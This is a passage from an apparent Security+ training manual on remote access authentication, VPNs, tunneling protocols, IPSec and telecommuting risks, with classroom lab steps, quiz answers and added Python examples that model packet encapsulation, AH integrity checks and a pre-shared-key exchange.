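    version, ptype, seq_no, flags, session_id, length = HEADER.unpack(pkt[:HEADER.size])
    body = pkt[HEADER.size:]
    if len(body) != length:
        raise ValueError("bad TACACS+ length")
    if not flags & TAC_PLUS_UNENCRYPTED_FLAG:
        body = obfuscate(body, session_id, key, version, seq_no)
    return seq_no, session_id, body


def parse_authen_start(body):
    action, priv, atype, svc, ul, pl, rl, dl = body[:8]
    if 8 + ul + pl + rl + dl != len(body):
        raise ValueError("START field lengths do not match body length")
    i = 8
    user, i = body[i:i + ul], i + ul
    port, i = body[i:i + pl], i + pl
    rem_addr, i = body[i:i + rl], i + rl
    return {"action": action, "priv_lvl": priv, "authen_type": atype, "service": svc,
            "user": user, "port": port, "rem_addr": rem_addr, "data": body[i:i + dl]}


if __name__ == "__main__":
    key = b"tacacs-key"
    start = authen_start_body(b"alice", b"tty0", b"192.0.2.10")
    wire = build_packet(start, 0x1234ABCD, key)
    print("username visible on the wire:", b"alice" in wire)
    print("server sees:", parse_authen_start(parse_packet(wire, key)[2])["user"])
```

                         The pseudo-pad depends only on the session id, sequence number, version byte
                         and key, and the body carries no integrity check: a bit flipped in transit is
                         not detected, and anyone holding the static key reads every session. That is
                         why RFC 8907 labels the scheme obfuscation and calls for a protected transport,
                         and why the unencrypted flag is for testing only.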

Do it!              B-3:     Enabling dial-in access
                      Here’s how                         Here’s why
                       1 Click Start                     You are logged in as Administrator.

                       2 Right-click My Computer         Windows Server 2003 does not allow dial-in
                                                         access by default. In order to allow remote
                                                         access to a Windows Server 2003 server, you
                                                         must configure the Remote Access Permissions
                                                         on a user-by-user basis.

                          Choose Manage

                       3 Expand Local Users and Groups

                          Select Users

                       4 Double-click Administrator

                       5 Activate the Dial-in tab

                          Select Allow access




                                                         Under Remote Access Permission (Dial-in or
                                                         VPN), as shown here.

                          Click OK

                       6 Double-click User1
                         and repeat step 5

                       7 Double-click User2
                         and repeat step 5

                       8 Close the Computer Management
                         window

Do it!   B-4:   Discussing authentication protocols
          Questions and answers
          1 TACACS+ cannot support AppleTalk Remote Access, NetBIOS Frame Protocol
            Control, Novell Asynchronous Services Interface, and X.25 PAD connections.
            True or false?

            False: TACACS+ can support all these protocols.

          2 Which of the following authentication protocols is geared toward wireless
            networks?
            A    TACACS+
            B    802.1X
            C    PPP
            D    RADIUS

          3 Which authentication protocol uses TCP for transport?

            TACACS+


Topic C: Virtual private networks
                        This topic covers the following CompTIA Security+ exam objective:

                         #       Objective

                         2.1     Recognize and understand the administration of the following types of remote access
                                 technologies
                                  • VPN (Virtual Private Network)
                                  • L2TP / PPTP (Layer Two Tunneling Protocol / Point to Point Tunneling Protocol)
                                  • SSH (Secure Shell)
                                  • IPSEC (Internet Protocol Security)




                        Types of VPNs
Explanation             A virtual private network (VPN) is a tool that enables the secure transmission of data
                        over unsecured networks, such as the Internet. Remote sites and users are able to access
                        their network information as if using a private network (hence the name virtual private
                        network) without the costs associated with long-distance calls or leased lines.
                        A VPN uses security procedures and tunneling protocols to maintain privacy. Tunneling
                        enables a foreign protocol to travel across a network by encapsulating (wrapping) it
                        inside the packets of the host network. The security protocols supply an additional level
                        of security by encrypting the data before transmission.
                        There are two types of VPN commonly used in corporate networks:
                               • Site-to-site VPN
                               • Remote access VPN

                        Site-to-site VPN
The protocols listed here are discussed later in this Unit.
                        Site-to-site VPNs allow a corporation to connect to branch offices or other companies
                        over a public network. Each site requires a VPN gateway (dedicated hardware or a
                        router running VPN server software) to connect to the Internet. The gateway-to-gateway
                        architecture logically operates as a WAN, connecting offices through multiple “private
                        tunnels” across the Internet. All locations must use identical encryption and
                        encapsulation protocols and settings—PPTP, L2TP and IPSec are the most common.
                        Each local area network connects to the Internet with a router. The corporate hub
                        router uses a dedicated line to stay permanently connected to its local ISP so that it
                        can accept incoming tunnels; branch offices might use either dedicated lines or
                        dial-up. In both cases, the routers establish a secure tunnel across the Internet.

Remote access VPN
Companies that have many telecommuting employees will use remote access VPNs,
also called virtual private dial-up networks (VPDNs), to communicate long-distance.
The only cost involved is that of a local phone call to a local provider. The immediate
savings over the use of long-distance and toll-free calls can quickly recoup the startup
cost of implementing a VPN.

Equipment
Remote access VPNs can use a wide variety of communication modes, including analog
lines, ISDN lines, digital subscriber lines (DSL) and cable modems. The corporate
network has a VPN access point or server that is permanently connected to the Internet
and configured to accept incoming calls. The client is equipped with VPN client
software and has Internet access through an ISP. Both client and server must be running
the same encryption and encapsulation protocols.
There are many versions of VPN client software available to establish this type of
connectivity. Perhaps the most prominent and widely used is the Microsoft L2TP/IPSec VPN
client, which is built into Windows 2000, Windows XP, and Windows Server 2003 and was
offered as a separate download for Windows NT 4.0 and Windows 98/Me. It can configure
modems and other remote access devices as VPN adapters. Windows 2000 Server and Windows
Server 2003 also include the VPN server software (Routing and Remote Access).

Operation
To establish a remote access VPN, the client uses a local Internet service provider (ISP)
to connect to the Internet. The client then starts the VPN client software, which creates a
virtual connection to the access point or corporate network. This allows the Internet
service provider to act merely as a transporter of a data stream that has been encrypted
prior to the initial transmission, as shown in Exhibit 4-4.




Exhibit 4-4: Client-side tunneling

An alternative to installing or configuring the client computer to initiate the necessary
security communications is to outsource the VPN to a service provider. With this type
of configuration, there is no need for the company to maintain client-side software or
configurations. When implementing this type of solution, however, encryption does not
happen until the data reaches the provider’s network.
This results in an unsecured connection from the user’s computer to the provider’s
network access server, as shown in Exhibit 4-5. This also places the responsibility of
protecting corporate access to information with an external entity.

Exhibit 4-5: Service provider tunneling

In this scenario, remote users dial in to a service provider’s network or point of presence
(POP) via a local or toll-free number. The service provider, in turn, initiates a secure
encrypted tunnel to the corporate network. If security is of a high concern, this type of
implementation might not be the best choice.

VPN drawbacks
Cost benefits and flexibility aside, using VPNs does have its problems.
VPN devices are not completely fault tolerant, although there are efforts underway to
address this issue. In addition, there are diverse choices when implementing VPNs.
Software solutions tend to have trouble processing the multitude of simultaneous
connections that occur on a large network. This problem can be mitigated by using a
hardware solution, but that comes at a much higher cost. It’s also important to remember
that there is no such thing as absolute security. As more security is added to a network,
project costs increase and simplicity suffers, according to a law of diminishing returns:
each incremental increase in security beyond a certain point becomes more and more
expensive. A proper balance among these issues must be determined and maintained.

Do it!  C-1: Configuring a Windows Server 2003 VPN server

Instructor note: This activity takes place only at Server-X. Assist students with step 5,
if necessary. Explain to students that they will connect to this VPN server from Server-Y
in a later activity.

Here’s how / Here’s why
 1 On Server-X, click Start and choose Administrative Tools, Routing and Remote Access.
 2 Right-click the server name, to configure the server. Choose Configure and Enable
   Routing and Remote Access; the Routing and Remote Access Server Setup Wizard
   begins. Click Next.
 3 Select Remote Access (dial-up or VPN) and click Next. The Remote Access window
   appears.
 4 Check VPN and click Next.
 5 Select the network interface that connects this server to the Internet, and click Next.
   (This machine has two NICs installed.)
 6 Click Next to accept the default of automatically assigning IP addresses to remote
   clients.
 7 Click Next to accept the default value of No, use Routing and Remote Access to
   authenticate connection requests.
 8 Click Finish to start the Routing and Remote Access service.
 9 Click OK if prompted about configuring the DHCP Relay Agent.
10 Close the Routing and Remote Access window.

Do it!  C-2: Understanding VPNs

Questions and answers
 1 Tunneling is accomplished by _____________ the data packets within the packets
   of the host network.
    A    authenticating
    B    encapsulating
    C    decrypting
    D    encrypting

 2 Explain the difference between site-to-site and remote access VPNs.

    Site-to-site VPNs connect branch offices to the corporate network over the Internet using
    VPN gateways, in essence creating a WAN. Remote access VPNs are used to connect mobile
    users to the corporate network. The remote users must use VPN client software to connect
    to the ISP, and then establish a tunnel.

Tunneling protocols

Explanation
Tunneling hides or “encapsulates” the original packet inside a new packet. The new
packet has new addressing and routing information, which enables it to travel across
networks. When the new packet arrives at the destination network, the tunneling
protocol headers are stripped away, exposing the original packet. Two commonly used
tunneling protocols are Point-to-Point Tunneling Protocol (PPTP) and Layer Two
Tunneling Protocol (L2TP).

Point-to-Point Tunneling Protocol (PPTP)
The Point-to-Point Tunneling Protocol (PPTP) is built upon the well-established
Internet protocols PPP (Point-to-Point Protocol) and Transmission Control
Protocol/Internet Protocol (TCP/IP). PPP provides authentication, encryption and
compression of data sent over analog telephone lines. TCP/IP provides a transport
mechanism for conveying digital data over the Internet infrastructure. When a user
phones into an ISP to connect to the Internet, the data is sent to the ISP over a PPP
connection but then repackaged for transport over the Internet. This process uses
tunneling.
In the case of data sent over phone lines, the original data packets are encapsulated
within a PPP packet using Generic Routing Encapsulation Protocol version 2 (GRE v2).
PPTP then encrypts and encapsulates the PPP packets within IP datagrams for
transmission through the Internet.
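The encapsulation just described, worked through in code. This is an added example written for this page, not code from the manual or from any PPTP implementation: it builds a small IPv4 packet, wraps it in a PPP frame, then in a PPTP-style enhanced GRE header (key bit set, version 1, protocol type 0x880B, key field carrying the payload length and a call ID), then in a new outer IP header addressed between the two tunnel endpoints, and finally strips the layers again at the far end. The addresses, call ID and payload are constructed sample values; the 0xFF 0x03 PPP address/control prefix is included for illustration, and the sequence and acknowledgement fields of the real PPTP GRE header are omitted.

```python
import socket
import struct

IPPROTO_GRE = 47         # IP protocol number that carries GRE
GRE_PROTO_PPP = 0x880B   # GRE protocol type for a PPP payload (what PPTP uses)
PPP_PROTO_IPV4 = 0x0021  # PPP protocol field for an IPv4 datagram


def ipv4_checksum(header):
    """One's-complement checksum of an IPv4 header; returns 0 when the header is intact."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, proto, payload, ttl=64, ident=0):
    """Minimal IPv4 packet: 20-byte header without options, checksum filled in, then payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_ipv4(packet):
    """Split an IPv4 packet into header fields and payload (options-free headers only)."""
    vi, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (vi & 0x0F) * 4
    return {"version": vi >> 4, "ihl": ihl, "total_len": total_len, "ttl": ttl, "proto": proto,
            "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
            "checksum_ok": ipv4_checksum(packet[:ihl]) == 0, "payload": packet[ihl:total_len]}


def gre_encapsulate_ppp(ppp_frame, call_id):
    """PPTP-style enhanced GRE header (RFC 2637): K bit set, version 1, protocol 0x880B,
    key field = payload length (16 bits) | call ID (16 bits). Sequence/ack fields omitted."""
    return struct.pack("!BBHHH", 0x20, 0x01, GRE_PROTO_PPP, len(ppp_frame), call_id) + ppp_frame


def gre_decapsulate_ppp(gre_packet):
    """Check the GRE header and hand back (call_id, ppp_frame)."""
    flags, ver, proto, length, call_id = struct.unpack("!BBHHH", gre_packet[:8])
    if not (flags & 0x20) or (ver & 0x07) != 1 or proto != GRE_PROTO_PPP:
        raise ValueError("not a PPTP GRE header")
    if len(gre_packet) - 8 < length:
        raise ValueError("truncated GRE payload")
    return call_id, gre_packet[8:8 + length]


def tunnel_ip_packet(inner_packet, call_id, outer_src, outer_dst):
    """Tunnel an IP packet the way PPTP does: IP -> PPP frame -> GRE -> new outer IP header.
    The 0xFF 0x03 prefix is HDLC-style PPP address/control framing (for illustration)."""
    ppp_frame = b"\xff\x03" + struct.pack("!H", PPP_PROTO_IPV4) + inner_packet
    return build_ipv4(outer_src, outer_dst, IPPROTO_GRE, gre_encapsulate_ppp(ppp_frame, call_id))


def untunnel_ip_packet(outer_packet):
    """At the far end, strip outer IP, GRE and PPP and return (call_id, original IP packet)."""
    outer = parse_ipv4(outer_packet)
    if not outer["checksum_ok"] or outer["proto"] != IPPROTO_GRE:
        raise ValueError("outer packet is not an intact GRE carrier")
    call_id, ppp_frame = gre_decapsulate_ppp(outer["payload"])
    if ppp_frame[:2] != b"\xff\x03" or struct.unpack("!H", ppp_frame[2:4])[0] != PPP_PROTO_IPV4:
        raise ValueError("PPP frame does not carry IPv4")
    return call_id, ppp_frame[4:]


if __name__ == "__main__":
    # Constructed sample: a private-LAN packet carried between two public tunnel endpoints.
    inner = build_ipv4("10.0.0.5", "10.0.0.1", 17, b"hello")
    outer = tunnel_ip_packet(inner, call_id=7, outer_src="203.0.113.10", outer_dst="198.51.100.1")
    o = parse_ipv4(outer)
    print("on the wire:", o["src"], "->", o["dst"], "protocol", o["proto"])
    call_id, recovered = untunnel_ip_packet(outer)
    r = parse_ipv4(recovered)
    print("inside     :", r["src"], "->", r["dst"], "call", call_id)
```

On the wire only the outer addresses (the tunnel endpoints) and protocol 47 are visible; the private 10.0.0.x addresses travel inside the GRE payload, which is what the text means by the new packet having "new addressing and routing information".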
PPTP does much more than deliver messages. After a PPTP link has been established, it
provides its users with a virtual node on the corporate LAN or WAN. PPTP uses
Microsoft Point-to-Point Encryption (MPPE) to encrypt the data packets, and an
authentication protocol such as PAP or CHAP to verify users’ identities before granting
access to the corporate network.
PPTP employs TCP packets to perform status inquiry and signaling over the network.
The control packets are transmitted over a separate control channel and perform the
following tasks:
    • Query the status of communications servers
    • Provide in-band management
    • Allocate channels and place outgoing calls
    • Notify Windows NT/2000/Server 2003 servers of incoming calls
    • Transmit and receive user data with bi-directional flow control
    • Notify Windows NT/2000/Server 2003 servers of disconnected calls
    • Assure data integrity, while making the most efficient use of network bandwidth
      by tightly coordinating the packet flow

Layer Two Tunneling Protocol (L2TP)
Layer Two Tunneling Protocol (L2TP) combines the best features of PPTP with the L2F
protocol created by Cisco Systems to provide tunneling capabilities over IP, X.25,
Frame Relay, and Asynchronous Transfer Mode (ATM) infrastructures. L2TP uses UDP
to encapsulate PPP frames within L2TP headers as the tunneled data. As it has no native
encryption capabilities, L2TP must rely on other encryption technologies, such as IPSec,
to encrypt the data frames. Authentication is accomplished using TACACS+ or
RADIUS.

The following is a comparison of L2TP and PPTP:

Feature          L2TP                                             PPTP

Encryption       No native encryption; relies on other            Native PPP encryption, not
                 encryption protocols, such as IPSec.             compatible with IPSec. Encrypts
                                                                  data, but negotiations are sent
                                                                  in plaintext.

Authentication   RADIUS, TACACS+. Computer-level                  Standard PPP authentication
                 authentication uses certificate                  using PAP, CHAP or MS-CHAP
                 infrastructure, and user-level                   protocols.
                 authentication uses PPP authentication.

Data protocols   IP, IPX, SNA, NetBEUI                            IP only

Control port     UDP 1701                                         TCP 1723



IP Security protocol
IP Security Protocol (IPSec) is a suite of protocols used for encrypting data so it can
travel securely over a public IP network. It works at OSI layer 3, the network layer, to
send encrypted communications between two network devices. It’s commonly used to
secure VPN communications over an open network.

IPSec protocols
The IPSec protocol suite is made up of four separate protocols:
    • Authentication Header (AH) protocol signs the data packets using MD5 or SHA-1
      hashes and a shared secret key. This guarantees authenticity.
    • Encapsulating Security Payload (ESP) protocol encrypts the packet using a
      symmetric encryption algorithm (DES or 3DES) and a shared secret key. This
      ensures confidentiality.
    • IP Payload Compression Protocol (IPComp) compresses the data packet before
      transmission. When used in combination with ESP encryption, the compression
      is applied to the packet before encryption.
    • Internet Key Exchange (IKE) provides an automated method for negotiating the
      shared secret keys.
The protocols might be applied alone or in combination.

IPSec encryption modes
IPSec also offers two modes of encryption: transport and tunnel.
    • Transport mode encrypts the data portion of each packet, but not the header.
      This mode is used in host-to-host (peer-to-peer) communications.
    • Tunnel mode encrypts both the header and the data portion of each packet.
      Tunneling allows you to hide the source and destination addresses from hackers.
      This mode is used by VPN gateways.
To use IPSec, both the sender and the recipient must be IPSec compliant.
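An added example (written for this page, not taken from the manual or from any IPSec implementation) that shows two things from the passages above: how the Authentication Header "signs" a packet with a hash and a shared secret key, and how transport and tunnel mode differ in where the protection is applied. It models AH with HMAC-SHA1-96 computed over the packet after zeroing the IP header fields that routers are allowed to change in transit, so a TTL decrement on the way still verifies while a changed address does not. In transport mode AH sits between the host's own IP header and its payload; in tunnel mode the whole original packet rides behind a new gateway-to-gateway header and is covered in full. The key, addresses and payload are constructed sample values. Note that AH authenticates the inner packet rather than encrypting it; confidentiality is ESP's job.

```python
import hashlib
import hmac
import socket
import struct

IPPROTO_AH = 51         # IP protocol number of the Authentication Header
IPPROTO_IPIP = 4        # AH next-header value meaning "a whole IPv4 packet follows" (tunnel mode)
ICV_LEN = 12            # HMAC-SHA1-96: the 20-byte SHA-1 MAC truncated to 96 bits
AH_LEN = 12 + ICV_LEN   # fixed AH fields (next hdr, len, reserved, SPI, seq) + ICV


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    """Minimal 20-byte IPv4 header (checksum left 0 because AH zeroes it anyway)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def zero_mutable_fields(ip_header):
    """Fields routers rewrite in transit are excluded from the MAC by zeroing them."""
    h = bytearray(ip_header)
    h[1] = 0                 # TOS / DSCP
    h[6:8] = b"\x00\x00"     # flags + fragment offset
    h[8] = 0                 # TTL
    h[10:12] = b"\x00\x00"   # header checksum
    return bytes(h)


def _icv(key, ip_header, ah_fixed, payload):
    """ICV = truncated HMAC over (immutable IP header | AH with ICV zeroed | payload)."""
    covered = zero_mutable_fields(ip_header) + ah_fixed + bytes(ICV_LEN) + payload
    return hmac.new(key, covered, hashlib.sha1).digest()[:ICV_LEN]


def ah_transport(ip_header, payload, key, spi, seq):
    """Transport mode: keep the host's own header; insert AH between it and the payload."""
    orig_proto = ip_header[9]
    h = bytearray(ip_header)
    h[9] = IPPROTO_AH                                  # protocol field now says "AH"
    struct.pack_into("!H", h, 2, struct.unpack("!H", ip_header[2:4])[0] + AH_LEN)  # total length grows
    h = bytes(h)
    ah_fixed = struct.pack("!BBHII", orig_proto, AH_LEN // 4 - 2, 0, spi, seq)
    return h + ah_fixed + _icv(key, h, ah_fixed, payload) + payload


def ah_tunnel(inner_packet, gw_src, gw_dst, key, spi, seq):
    """Tunnel mode: the whole original packet becomes the payload behind a new gateway header,
    so the inner header (addresses, TTL, everything) is covered by the ICV in full."""
    outer = ipv4_header(gw_src, gw_dst, IPPROTO_AH, AH_LEN + len(inner_packet))
    ah_fixed = struct.pack("!BBHII", IPPROTO_IPIP, AH_LEN // 4 - 2, 0, spi, seq)
    return outer + ah_fixed + _icv(key, outer, ah_fixed, inner_packet) + inner_packet


def ah_verify(packet, key):
    """Receiver side: recompute the ICV. Returns (ok, next_header, spi, seq, payload)."""
    ip_header = packet[:20]
    if ip_header[9] != IPPROTO_AH:
        raise ValueError("no AH header present")
    ah = packet[20:20 + AH_LEN]
    next_header, len_words, _, spi, seq = struct.unpack("!BBHII", ah[:12])
    if (len_words + 2) * 4 != AH_LEN:
        raise ValueError("unexpected AH length")
    payload = packet[20 + AH_LEN:]
    ok = hmac.compare_digest(_icv(key, ip_header, ah[:12], payload), ah[12:])
    return ok, next_header, spi, seq, payload


if __name__ == "__main__":
    key = b"constructed-shared-secret"          # constructed; IKE would negotiate this
    payload = b"hello"                           # constructed payload
    hdr = ipv4_header("10.0.0.5", "10.0.0.1", 17, len(payload))
    pkt = ah_transport(hdr, payload, key, spi=0x1000, seq=1)
    hop = bytearray(pkt); hop[8] -= 1            # a router decremented the TTL
    bad = bytearray(pkt); bad[16] ^= 1           # the destination address was altered
    print("transport, after TTL hop:", ah_verify(bytes(hop), key)[0])    # True
    print("transport, address tampered:", ah_verify(bytes(bad), key)[0])  # False
    tun = ah_tunnel(hdr + payload, "203.0.113.10", "198.51.100.1", key, spi=0x2000, seq=7)
    print("tunnel mode next header:", ah_verify(tun, key)[1])            # 4 (IPv4 inside)
```

The receiver needs the same key and the SPI to know which security association applies; here the key is passed directly, whereas in IPSec it is the result of the IKE negotiation described below.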
How it works
To communicate using IPSec, the following steps must take place:
    1 An administrator creates an IPSec policy. This contains a set of rules that define
      what types of traffic (for example, HTTP or FTP) require encryption and which
      encryption and/or authentication protocols to use. Each rule can specify
      multiple authentication methods.
    2 The administrator distributes the IPSec policy to all targeted machines.
    3 The two hosts automatically negotiate the authentication and encryption method
      to be used for communication. Which protocols are selected depends on the
      IPSec policy.
    4 If the selected protocol requires negotiating secret keys, IKE is employed.
      One of three methods is implemented:
         • Both parties use a password known as a pre-shared key. The two parties
           swap a hashed version of the pre-shared key, and then attempt to recreate
           the hashed data. If successful, both parties can begin secure
           communications.
         • Both parties exchange public keys that have been certified by a CA.
         • Both parties use Kerberos v5 for authentication.
    5 The IP packets are encrypted and/or signed according to the negotiated terms.
All functions of IPSec remain transparent to the user.
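The pre-shared-key method of step 4, as an added example written for this page. It is a simplified model of the idea, not IKE's actual message formats and not any vendor's code: each side sends an identity and a fresh nonce, then proves it knows the PSK by sending a keyed hash over its identity and both nonces; the peer recreates that value from its own copy of the PSK and compares. The PSK never crosses the wire, and because the nonces change per session, a hashed value recorded from one exchange does not satisfy a later one. Identities, nonces and the PSK values are constructed sample data.

```python
import hashlib
import hmac
import secrets


class Peer:
    """One party in a PSK authentication exchange (simplified model of IKE's PSK method)."""

    def __init__(self, identity, psk, nonce=None):
        self.identity = identity
        self.psk = psk                                  # shared secret, configured out of band
        self.nonce = nonce if nonce is not None else secrets.token_bytes(16)
        self.peer_identity = None
        self.peer_nonce = None

    def hello(self):
        """Messages 1 and 2: identity plus a fresh nonce, sent in the clear."""
        return {"id": self.identity, "nonce": self.nonce}

    def receive_hello(self, msg):
        self.peer_identity = msg["id"]
        self.peer_nonce = msg["nonce"]

    def _auth_value(self, identity, prover_nonce, verifier_nonce):
        # Keyed hash over (identity | prover's nonce | verifier's nonce).
        # Only a holder of the PSK can produce or recreate it.
        data = identity.encode() + prover_nonce + verifier_nonce
        return hmac.new(self.psk, data, hashlib.sha256).digest()

    def auth(self):
        """Messages 3 and 4: the 'hashed version of the pre-shared key' the text describes."""
        return {"id": self.identity,
                "auth": self._auth_value(self.identity, self.nonce, self.peer_nonce)}

    def verify(self, msg):
        """Recreate the peer's value from our own PSK copy and compare in constant time."""
        if msg["id"] != self.peer_identity:
            return False
        expected = self._auth_value(msg["id"], self.peer_nonce, self.nonce)
        return hmac.compare_digest(expected, msg["auth"])


def run_exchange(psk_initiator, psk_responder, nonce_i=None, nonce_r=None):
    """Run the four messages between two gateways; returns (initiator_ok, responder_ok).
    Both are True only when both sides hold the same PSK."""
    initiator = Peer("gw-a.example", psk_initiator, nonce_i)    # constructed identities
    responder = Peer("gw-b.example", psk_responder, nonce_r)
    responder.receive_hello(initiator.hello())          # message 1
    initiator.receive_hello(responder.hello())          # message 2
    responder_ok = responder.verify(initiator.auth())   # message 3
    initiator_ok = initiator.verify(responder.auth())   # message 4
    return initiator_ok, responder_ok


def stale_auth_is_rejected(psk):
    """A value recorded in one session must not verify in a later one: the responder's
    nonce is fresh, so the recreated hash differs. Returns True when the design holds."""
    initiator = Peer("gw-a.example", psk)
    first = Peer("gw-b.example", psk)
    first.receive_hello(initiator.hello())
    initiator.receive_hello(first.hello())
    recorded = initiator.auth()                 # valid only for the session with `first`
    later = Peer("gw-b.example", psk)           # new session, new nonce
    later.receive_hello(initiator.hello())
    return not later.verify(recorded)


if __name__ == "__main__":
    print("same PSK:", run_exchange(b"psk-1", b"psk-1"))        # (True, True)
    print("different PSKs:", run_exchange(b"psk-1", b"psk-2"))  # (False, False)
    print("stale value rejected:", stale_auth_is_rejected(b"psk-1"))  # True
```

The strength of this method rests entirely on the PSK: a short or guessable pre-shared key gives an observer of the exchanged hashes something to test candidates against offline, which is why the text's two other options (CA-certified public keys and Kerberos v5) exist.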

Secure Shell
A secure shell (SSH) is a secure replacement for remote logon and file transfer programs
such as Telnet and FTP, which transmit data in unencrypted text. SSH uses a public key
authentication method to establish an encrypted and secure connection from the user’s
machine to the remote machine. When the secure connection is established, the
username, password, and all other information are sent over this secure connection.

Instructor note: Tell students that in SSH, public key authentication is used before a
connection is established. Mention that SSH is rapidly replacing Telnet for remote
administration of UNIX and Linux systems, and even some Windows systems.

SSH is becoming a standard for remote logon administration. It has become so popular
that there are many ports of SSH for various platforms, and there are free clients
available to log on to an SSH server from many platforms as well. SSH Certifier is
designed to be a widely applicable product, and it runs on a wide variety of different
platforms including Windows, Linux, HP-UX and Solaris.

In the Certifier enrollment process, the end user requesting a certificate must be
authenticated. If the entity has a valid certificate, the private key can be used for
authentication when using certain enrollment protocols; however, the user does not
typically possess a valid private key for the enrollment process. First-time authentication
can be done either manually or by generating shared secrets for entities. When shared
keys are delivered to end entities by secure means, the users can authenticate themselves
during the online enrollment, and the request can be approved automatically, if the
policy allows automatic acceptance.
This method is especially useful in applications in which shared secrets can be delivered
in the same package with the client software and certification authority certificate. If the
enrollment protocol does not support shared secrets or they are just not used,
authentication has to be done in an out-of-band way, such as by showing valid identity
information to the operator. The operator can then make the approval decision
manually.
The authentication requirements and the certificate templates for the certificate issuance
are defined in the certification policy. The policy can be configured via the
administration graphical user interface.
The key components of the SSH Certifier product are the engine, the administration
server, the enrollment gateway, and the publishing server. Each of these components can
be placed either on separate machines or on a single machine.
    • The engine receives certification requests from the enrollment gateway, makes
      policy decisions, and generates and signs certificates and Certificate Revocation
      Lists (CRLs). The engine also communicates with the administration server and
      performs the required database queries.
    • The administration server is an HTTP server with a Transport Layer Security
      (TLS) implementation. The graphical user interface can be easily customized by
      modifying the HTML code, and the functionality of the GUI can be expanded by
      using the script tools of Certifier.
    • The enrollment gateway has the server-side implementations of the supported
      certificate enrollment protocols. It receives certificate requests from the
      enrollment clients and forwards them to the engine for policy decisions. The
      enrollment gateway also sends confirmation messages and issues certificates to
      end entities.
    • The issued certificates and CRLs are sent to the publishing server, which
      performs the LDAP publishing in the directory.
For more information on IPSec and SSH, visit www.ssh.com.

Do it!  C-3: Using PPTP to connect to a VPN server

Instructor note: Students will perform this activity in pairs on Server-X and Server-Y as
indicated in the activity steps. If students are prompted to provide Location information,
tell them to enter an area code and click OK twice.

Here’s how / Here’s why
 1 On Server-Y, click Start.
 2 Choose Control Panel, Network Connections, New Connection Wizard.
 3 Click Next.
 4 Select Connect to the network at my workplace, and click Next.
 5 Select Virtual Private Network connection, and click Next.
 6 Type Class VPN PPTP to specify a name for the connection, and click Next.
 7 Enter the IP address of the VPN server (Server-X), and click Next. If you don't know
   Server-X's IP address, have your partner open a Command window, enter ipconfig and
   note the server's IP address.
 8 Select Anyone's use, and click Next.
 9 Check Add a shortcut to this connection to my desktop.
10 Click Finish. You are prompted to log on.
11 Log on as Administrator. You are now connected to Server-X.
12 On Server-X, access Computer Management, to configure the Administrator account
   to require a remote access policy for access.
13 Change the Administrator user's dial-in access to Control access through Remote
   Access Policy. Activate the Dial-in tab in the Properties of the Administrator user to
   see the option.
14 At Server-Y, disconnect the Class VPN PPTP connection and try to connect again. The
   connection is denied because an appropriate remote access policy has not been
   configured.
15 Close all windows.

Do it!  C-4: Discussing tunneling protocols

Questions and answers
 1 TCP/IP transports digital data over the Internet infrastructure. True or false?

    True

 2 Data sent from a dial-up modem is encapsulated within a(n) _______ packet.
    A      PPP
    B      IP
    C      IPX
    D      NetBEUI

 3 PPTP uses IPSec to authenticate users. True or false?

    False: It uses PPP for authentication.

 4 L2TP uses UDP to encapsulate PPP frames with L2TP headers. True or false?

    True

 5 L2TP provides tunneling capabilities for which of the following internetworks?
    A      Frame Relay
    B      ATM
    C      IP
    D      All of the above

 6 Describe the differences in the IPSec transport and tunnel modes.

    Transport mode encrypts the data portion of each packet, but not the header. It’s typically
    used in host-to-host VPNs. Tunnel mode encrypts both the header and the data portion of
    each packet. It’s used in host-to-gateway or gateway-to-gateway VPN communications.

 7 Which protocol uses the IKE public key system to certify and sign data packets?

    Authentication header

 8 Which protocol uses symmetric encryption to encrypt the IP payload for
   confidentiality?

    Encapsulating security payload

 9 Which of the following protocols can be used with PPTP?
    A      IPX/SPX
    B      NetBEUI
    C      TCP/IP
    D      AppleTalk


Topic D: Telecommuting vulnerabilities
This topic covers the following CompTIA Security+ exam objective:

 #     Objective

 2.1   Recognize and understand the administration of the following types of remote access
       technologies

       •   Vulnerabilities



Telecommuting

Explanation
Many large companies have begun using remote access technologies as a method to
reduce costs and improve employee satisfaction. The benefits gained by telecommuting
must be carefully weighed against the increased vulnerabilities.
In the telecommuting model, the home office is arguably not trusted. The lack of
physical access control means that no matter how trusted a computer is when first
configured, after spending time at a user’s home, the state of the machine is in
question.

Security issues
Although VPNs and encryption are powerful tools, they do not protect against all
threats. Misconfigured firewalls, unrestricted physical access, weak encryption, and
sporadic auditing leave the remote PC an easy target for attackers.

Split tunneling
The simplest VPN configuration consists of a VPN client computer with an Internet
connection. This setup can introduce a major risk called split tunneling. Split tunneling
allows a remote PC to surf the Web and access the corporate VPN simultaneously. The
benefit of split tunneling is that corporations can conserve bandwidth needed for
Internet access at VPN hub sites and reduce the load on VPN gateways. The drawback
is that, if a remote PC is connected directly to the Web and at the same time tied into the
VPN, attackers coming in from the Web could commandeer the PC and gain access to
the corporate network.
The integrity of the remote PC can just as easily be compromised while the user is Web
surfing with the VPN tunnel turned off. Viruses or back doors downloaded while
surfing would threaten the VPN the next time it is connected.
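A check an administrator could run against a remote PC's routing table to tell whether split tunneling is in effect, as an added example written for this page (it is not from the manual or from any vendor tool). It reads a route listing in the five columns a Windows route print table uses (destination, netmask, gateway, interface, metric), finds which interface carries traffic to an Internet address, and reports which corporate prefixes are not reached through the VPN adapter. The two route tables, the VPN adapter address 10.8.0.5 and the corporate prefixes are constructed sample values; the "full tunnel" table models a client that sends all traffic through the tunnel by installing a lower-metric default route on the VPN adapter.

```python
import ipaddress

# Constructed sample: a remote PC on a home LAN (192.168.1.0/24) with a VPN adapter at 10.8.0.5.
# Only 10.0.0.0/8 is routed through the tunnel; the default route still points at the home router.
ROUTES_SPLIT = """\
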